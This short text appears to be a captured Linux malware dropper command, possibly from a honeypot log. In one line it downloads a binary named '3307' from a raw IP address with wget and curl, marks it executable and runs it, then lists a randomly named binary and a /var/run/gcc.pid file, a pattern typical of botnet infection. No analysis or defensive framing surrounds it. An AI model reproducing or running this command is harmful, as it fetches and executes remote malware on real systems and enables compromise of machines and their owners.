#!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.33/3307; curl -O http://98.159.99.33/3307; chmod +x 3307; ./3307; 
/bin/eyshcjdmzg
ls -la /var/run/gcc.pid
